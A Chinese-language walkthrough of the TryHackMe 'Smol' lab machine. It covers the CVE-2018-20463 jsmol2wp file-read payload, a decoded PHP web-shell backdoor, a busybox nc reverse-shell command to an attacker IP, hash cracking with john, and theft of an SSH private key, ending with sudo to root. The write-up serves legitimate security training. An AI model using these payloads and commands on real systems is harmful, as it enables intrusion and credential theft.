TryHackMe: Smol 渗透测试实战教学文档<\/strong><\/h3>
文档概述<\/strong><\/h4>
本教学文档旨在详细解析TryHackMe平台上“Smol”靶机的完整渗透测试过程。该靶机涉及WordPress安全<\/strong>、插件漏洞利用（CVE-2018-20463）<\/strong>、后门发现与利用<\/strong>、横向移动<\/strong>以及权限提升<\/strong>等多个关键知识点。通过本教程，您将学习到一套完整的Web应用渗透测试方法论。<\/p>
第一阶段：信息收集与初始访问<\/strong><\/h4>
1. 目标识别与端口扫描<\/strong><\/p>

行动<\/strong>：使用端口扫描工具（如Nmap）对目标进行扫描。<\/li>
结果<\/strong>：发现开放了80端口（HTTP服务），但直接访问IP地址无法显示页面。<\/li>
关键点<\/strong>：根据提示，需要修改本地\/etc\/hosts<\/code>文件，将域名www.smol.thm<\/code>解析到目标机器的IP地址。这是解决虚拟主机路由问题的常见方法。命令示例<\/strong>：echo "目标IP www.smol.thm" | sudo tee -a \/etc\/hosts<\/code><\/li> <\/ul> <\/li> <\/ul> 2. 网站初步侦察<\/strong><\/p> 行动<\/strong>：访问http:\/\/www.smol.thm<\/code>。<\/li> 发现<\/strong>：网站基于WordPress搭建。<\/li> 发现一个用户邮箱：admin@smol.thm<\/code>（潜在的用户名admin<\/code>）。<\/li> <\/ul> <\/li> <\/ul> 3. 使用WPScan进行深度扫描<\/strong><\/p> 行动<\/strong>：使用专门针对WordPress的扫描器WPScan，枚举主题、插件和用户。<\/li> 命令示例<\/strong>：wpscan --url http:\/\/www.smol.thm -e ap,at,u<\/code><\/li> 关键发现<\/strong>： WordPress版本<\/strong>：6.7.1<\/li> 主题<\/strong>：2023，版本1.2<\/li> 关键插件<\/strong>：jsmol2wp<\/code> 插件路径：http:\/\/www.smol.thm\/wp-content\/plugins\/jsmol2wp\/<\/code><\/li> 信息文件：通过访问\/readme.txt<\/code>（http:\/\/www.smol.thm\/wp-content\/plugins\/jsmol2wp\/readme.txt<\/code>）了解插件功能。<\/li> <\/ul> <\/li> 目录<\/strong>：发现上传目录\/wp-content\/uploads\/<\/code>，可能存放敏感文件。<\/li> <\/ul> <\/li> <\/ul> 4. 漏洞研究与利用（CVE-2018-20463）<\/strong><\/p> 漏洞分析<\/strong>：jsmol2wp<\/code>插件存在一个服务器端请求伪造（SSRF）<\/strong> 漏洞，该漏洞允许攻击者通过精心构造的请求读取服务器上的任意文件。<\/li> 漏洞利用Payload<\/strong>： \/wp-content\/plugins\/jsmol2wp\/php\/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php:\/\/filter\/resource=..\/..\/..\/..\/wp-config.php <\/code><\/pre> <\/li> 利用过程<\/strong>：将上述Payload拼接在目标URL后访问。<\/li> wp-config.php<\/code>是WordPress的核心配置文件，通常包含数据库用户名和密码<\/strong>。<\/li> 成功读取该文件，获取数据库凭据（例如：用户wpuser<\/code>及其密码）。<\/li> <\/ol> <\/li> <\/ul> 5. 进入WordPress后台<\/strong><\/p> 行动<\/strong>：访问http:\/\/www.smol.thm\/wp-admin<\/code>。<\/li> 使用之前发现的用户名admin<\/code>和从wp-config.php<\/code>中获取的数据库密码尝试登录。<\/li> <\/ol> <\/li> 结果<\/strong>：成功进入WordPress管理后台。<\/li> <\/ul> 第二阶段：在WordPress内获取Shell<\/strong><\/h4> 1. 发现隐藏后门<\/strong><\/p> 线索<\/strong>：文章中提到页面有“滚动的歌词”和“Webmaster Tasks!!”提示，联想到WordPress的“Hello Dolly”示例插件。<\/li> 行动<\/strong>：在GitHub上搜索“Hello Dolly”的原始代码，与目标插件jsmol2wp<\/code>中的hello.php<\/code>文件进行对比。<\/li> 利用已发现的SSRF漏洞，直接读取hello.php<\/code>文件。 URL：http:\/\/www.smol.thm\/wp-content\/plugins\/jsmol2wp\/php\/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php:\/\/filter\/resource=..\/..\/hello.php<\/code><\/li> <\/ul> <\/li> <\/ol> <\/li> 关键发现<\/strong>：读取到的hello.php<\/code>文件内容中包含一段经过Base64编码的可疑代码。<\/li> 代码分析<\/strong>：解码<\/strong>：CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA=<\/code><\/li> 解码后<\/strong>：if (isset($_GET["\143\155\x64"])) { system($_GET["\143\x6d\144"]); }<\/code><\/li> 字符转义解析<\/strong>：\143<\/code>是八进制，\x64<\/code>是十六进制，它们分别对应ASCII字符。 \143<\/code> -> c, \155<\/code> -> m, \x64<\/code> -> d。因此"\143\155\x64"<\/code>就是字符串"cmd"<\/code>。<\/li> 同理，"\143\x6d\144"<\/code>也是"cmd"<\/code>。<\/li> <\/ul> <\/li> 最终功能<\/strong>：这段代码是一个简单的Web Shell，它检查URL参数中是否存在cmd<\/code>，如果存在，则执行该参数指定的系统命令。即：if (isset($_GET[‘cmd’])) { system($_GET[‘cmd’]); }<\/code><\/li> <\/ol> <\/li> <\/ul> 2. 利用后门获取反向Shell<\/strong><\/p> 原理<\/strong>：由于hello.php<\/code>文件已被jsmol2wp<\/code>插件调用，其中的恶意代码已经生效，我们可以直接向该插件的入口点发送请求并附带命令参数。<\/li> 获取Shell步骤<\/strong>：在攻击机上监听一个端口（如4444）：nc -lvnp 4444<\/code><\/li> 向目标服务器发送一个请求，命令其建立到攻击机的反向连接。使用busybox nc<\/code>（一个精简版的netcat）。<\/li> 利用URL<\/strong>： http:\/\/www.smol.thm\/wp-content\/plugins\/jsmol2wp\/php\/jsmol.php?isform=true&call=getRawDataFromDatabase&query=test&cmd=busybox nc 你的攻击机IP 4444 -e bash <\/code><\/pre> <\/li> 成功在攻击机上获得一个反向Shell连接。<\/li> 提升Shell交互性<\/strong>：在获得的Shell中执行python3 -c 'import pty; pty.spawn("\/bin\/bash")'<\/code>，以获得一个更稳定的、支持Tab补全等功能的交互式Shell。<\/li> <\/ol> <\/li> <\/ul> 第三阶段：横向移动<\/strong><\/h4> 1. 枚举系统用户<\/strong><\/p> 行动<\/strong>：查看\/etc\/passwd<\/code>文件，发现多个用户：think<\/code>, xavi<\/code>, diego<\/code>, gege<\/code>。<\/li> <\/ul> 2. 数据库密码破解与用户切换<\/strong><\/p> 行动<\/strong>：使用之前获得的数据库凭据登录MySQL：mysql -u wpuser -p<\/code><\/li> 在WordPress数据库（通常是wp_<\/code>前缀）的wp_users<\/code>表中，找到用户密码的哈希值。<\/li> 使用john<\/code>（John the Ripper）工具破解哈希。将哈希保存到文件hash.txt<\/code>。<\/li> 使用命令john hash.txt --wordlist=\/usr\/share\/wordlists\/rockyou.txt<\/code>进行破解。<\/li> <\/ul> <\/li> <\/ol> <\/li> 结果<\/strong>：成功破解用户diego<\/code>的密码。<\/li> 切换用户<\/strong>：在获得的Shell中，使用su - diego<\/code>命令并输入破解的密码，切换到diego<\/code>用户。可以获取user.txt<\/code>标志。<\/li> <\/ul> 3. 利用Linux组权限进行横向移动<\/strong><\/p> 关键发现<\/strong>：执行id<\/code>命令，发现当前用户diego<\/code>属于一个名为internal<\/code>的组。<\/li> 行动<\/strong>：查看\/etc\/group<\/code>文件，找到internal<\/code>组的所有成员。<\/li> 由于同组用户对彼此的家目录可能有读权限，可以遍历这些用户的家目录。<\/li> <\/ol> 在gege<\/code>用户目录下，发现一个可疑的压缩包wordpress.old.zip<\/code>。<\/li> 在think<\/code>用户目录下的.ssh<\/code>文件夹中，找到了私钥文件id_rsa<\/code>。<\/li> <\/ul> <\/li> <\/ul> 4. 通过SSH密钥切换至think用户<\/strong><\/p> 行动<\/strong>：复制think<\/code>用户的私钥id_rsa<\/code>到攻击机。<\/li> 修改私钥文件权限为600：chmod 600 think_id_rsa<\/code><\/li> 使用私钥登录到think<\/code>用户：ssh -i think_id_rsa think@目标IP<\/code><\/li> <\/ol> <\/li> <\/ul> 5. 分析PAM配置，切换至gege用户<\/strong><\/p> 关键发现<\/strong>：查看\/etc\/pam.d\/su<\/code>文件，发现特殊配置： auth [<\/span>success=<\/span>ignore default=<\/span>1]<\/span> pam_succeed_if.so user =<\/span> gege <\/span><\/span>auth sufficient pam_succeed_if.so use_uid user =<\/span> think <\/span><\/span><\/code><\/pre><\/li> 配置解读<\/strong>：这行配置意味着，用户think<\/code>在尝试su<\/code>到任何用户时，如果目标是gege<\/code>，则认证会直接成功（sufficient<\/code>），无需输入密码。<\/li> 行动<\/strong>：从think<\/code>用户直接切换到gege<\/code>用户：su - gege<\/code><\/li> <\/ul> 6. 破解受密码保护的压缩包<\/strong><\/p> 行动<\/strong>：在gege<\/code>用户目录下，用Python启动一个简单的HTTP服务器：python3 -m http.server 8080<\/code><\/li> 在攻击机上下载wordpress.old.zip<\/code>文件。<\/li> 使用zip2john<\/code>工具从压缩包中提取哈希：zip2john wordpress.old.zip > archive_hash<\/code><\/li> 使用john<\/code>破解该哈希：john archive_hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt<\/code><\/li> 使用破解出的密码解压压缩包。<\/li> <\/ol> <\/li> 结果<\/strong>：在解压后的文件中，找到了另一个wp-config.php<\/code>文件，其中包含了用户xavi<\/code>的数据库密码（很可能也是系统密码）。<\/li> <\/ul> 第四阶段：权限提升（Privilege Escalation）<\/strong><\/h4> 1. 切换至xavi用户并检查sudo权限<\/strong><\/p> 行动<\/strong>：切换到xavi<\/code>用户：su - xavi<\/code>（使用从压缩包中找到的密码）。<\/li> 检查该用户可以使用sudo<\/code>执行的命令：sudo -l<\/code><\/li> <\/ol> <\/li> 关键发现<\/strong>：输出结果显示(ALL : ALL) ALL<\/code>，这意味着用户xavi<\/code>可以通过sudo<\/code>执行任何<\/strong>命令，拥有完全的root权限。<\/li> <\/ul> 2. 获取Root权限与最终标志<\/strong><\/p> 行动<\/strong>：直接使用sudo<\/code>提权到root。 sudo su -<\/code> 或 sudo bash<\/code><\/li> <\/ul> <\/li> 结果<\/strong>：成功获得root权限，可以读取系统中的最终标志root.txt<\/code>。<\/li> <\/ul> 总结与知识点回顾<\/strong><\/h4> 信息收集是关键<\/strong>：域名解析、WPScan扫描为后续攻击奠定了基础。<\/li> 关注第三方组件<\/strong>：WordPress插件、主题是常见的安全薄弱点。<\/li> 漏洞利用链<\/strong>：结合SSRF漏洞（CVE-2018-20463）读取配置文件，再利用其中的凭据进行横向渗透。<\/li> 代码审计意识<\/strong>：对可疑文件（如hello.php<\/code>）进行审计，发现隐藏的后门。<\/li> Linux权限与组管理<\/strong>：理解Linux文件权限和用户组机制是横向移动的核心。<\/li> PAM配置审计<\/strong>：\/etc\/pam.d\/<\/code>下的配置文件可能包含非标准的认证逻辑，是提权的重要线索。<\/li> 密码破解<\/strong>：熟练使用john<\/code>、zip2john<\/code>等工具。<\/li> sudo权限检查<\/strong>：sudo -l<\/code>是Linux系统权限提升的必做步骤。<\/li> <\/ol> 通过本次实战，您应该对中等级别的渗透测试流程有了更深入的理解。请务必在合法授权的环境中练习这些技术。<\/p>